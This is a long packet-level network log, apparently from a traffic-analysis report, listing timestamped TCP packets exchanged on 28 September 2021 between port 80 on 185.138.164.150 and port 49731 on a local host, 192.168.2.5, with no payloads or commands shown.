Sep 28, 2021 07:38:33.042087078 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:33.042090893 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:33.042114019 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:33.042139053 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:33.042139053 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:33.042161942 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:33.042186975 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:33.042186975 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:33.042212009 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:33.042233944 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:33.042234898 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:33.042258978 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:33.042335987 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:33.042352915 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:33.042381048 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:33.042406082 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:33.042406082 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:33.042432070 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:33.042454958 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:33.042455912 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:33.042483091 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:33.042500973 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:33.042503119 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:33.042526007 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:33.042550087 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:33.042565107 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:33.042573929 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:33.042598963 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:33.042617083 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:33.042618036 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:33.042643070 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:33.042651892 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:33.042663097 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:33.042681932 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:33.042706013 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:33.042722940 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:33.042731047 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:33.042754889 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:33.042756081 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:33.042781115 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:33.042783022 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:33.042804956 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:33.042831898 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:33.042841911 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:33.042856932 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:33.042884111 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:33.042900085 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:33.042922974 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:33.042948008 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:33.042958975 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:33.042970896 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:33.042996883 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:33.042998075 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:33.043021917 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:33.043042898 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:33.043045044 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:33.043066978 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:33.043091059 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:33.043100119 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:33.043128967 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:33.043157101 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:33.043164015 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:33.043183088 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:33.043206930 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:33.043207884 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:33.043236017 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:33.043251991 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:33.045444012 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:33.046068907 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:33.046519041 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:33.046547890 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:33.046571016 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:33.046597004 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:33.046607971 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:33.046623945 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:33.046646118 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:33.046669960 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:33.046677113 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:33.046693087 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:33.046695948 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:33.046715975 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:33.046722889 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:33.046739101 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:33.046761036 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:33.046762943 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:33.046787977 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:33.046801090 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:33.046811104 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:33.046833992 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:33.046857119 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:33.046864986 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:33.046880007 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:33.046901941 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:33.046904087 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:33.046924114 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:33.046946049 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:33.046947002 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:33.046972990 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:33.046994925 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:33.047003031 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:33.047027111 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:33.047051907 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:33.047055006 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:33.047075987 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:33.047095060 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:33.047096968 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:33.047132969 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:33.047154903 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:33.047156096 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:33.047182083 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:33.047204971 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:33.047209978 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:33.047230005 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:33.047250032 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:33.047252893 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:33.047293901 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:33.049540043 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:33.050276041 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.212371111 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.247255087 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.477823019 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.477875948 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.477904081 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.477922916 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.477948904 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.477973938 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.477997065 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.478005886 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.478023052 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.478055954 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.478084087 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.478115082 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.478141069 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.478187084 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.516737938 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.520493031 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.520530939 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.520555973 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.520570993 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.520610094 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.520840883 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.520872116 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.520899057 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.520920038 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.521172047 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.521198988 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.521225929 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.521290064 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.521337986 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.521524906 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.521553040 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.521599054 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.521616936 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.522139072 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.522217035 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.522248030 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.522278070 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.522303104 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.522320986 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.522331953 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.522356987 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.522392035 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.522593021 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.522644043 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.556389093 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.556421995 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.556444883 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.556514025 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.556705952 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.556730986 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.556768894 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.556832075 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.556849957 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.556866884 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.556875944 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.556915045 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.557086945 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.557235956 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.557279110 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.557384968 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.557404995 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.557449102 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.557786942 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.557818890 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.557842016 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.557866096 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.558374882 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.558402061 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.558418989 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.558437109 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.558439016 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.558454037 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.558465004 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.558475971 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.558495045 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.558511019 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.558512926 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.558527946 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.558545113 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.558547974 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.558572054 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.558650017 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.558670044 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.558687925 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.558696032 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.558711052 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.558757067 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.558782101 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.558831930 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.559237003 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.559355974 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.559375048 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.559408903 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.559557915 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.559609890 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.559705973 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.559722900 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.559763908 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.560070992 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.560216904 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.560237885 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.560255051 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.560257912 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.560302973 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.592199087 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.592320919 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.592348099 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.592400074 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.592436075 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.592458963 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.592483044 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.592483997 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.592551947 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.594418049 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.594542027 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.594563007 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.594584942 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.594604015 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.594625950 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.594650984 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.594688892 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.598121881 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.598155975 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.598228931 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.598252058 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.598253012 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.598273993 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.598295927 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.598318100 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.598319054 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.598341942 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.598361969 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.598362923 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.598386049 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.598392963 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.598407984 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.598428965 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.598428965 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.598449945 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.598469019 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.598472118 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.598499060 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.598520041 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.598520994 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.598570108 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.598668098 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.598845005 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.598870039 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.598891020 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.598908901 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.598925114 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.598964930 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.599303007 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.599328995 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.599349976 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.599359035 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.599399090 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.599596977 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.599622011 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.599642992 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.599670887 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.599728107 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.599750042 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.599773884 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.599773884 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.599817038 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.600577116 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.600589991 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.600617886 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.600641966 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.600653887 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.600663900 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.600686073 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.600712061 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.600742102 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.601027966 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.601054907 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.601120949 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.601211071 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.601701021 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.601773977 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.601886034 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.601913929 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.601965904 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.602407932 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.602440119 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.602509022 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.602596045 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.602617979 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.602638960 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.602660894 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.602680922 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.602761030 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.602771997 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.603312016 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.603342056 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.603363037 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.603380919 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.603410959 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.603476048 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.603636980 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.603661060 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.603691101 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.604010105 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.604036093 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.604055882 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.604065895 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.604106903 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.604199886 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.604372978 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.604397058 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.604419947 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.604419947 CEST	49731	80	192.168.2.5	185.138.164.150
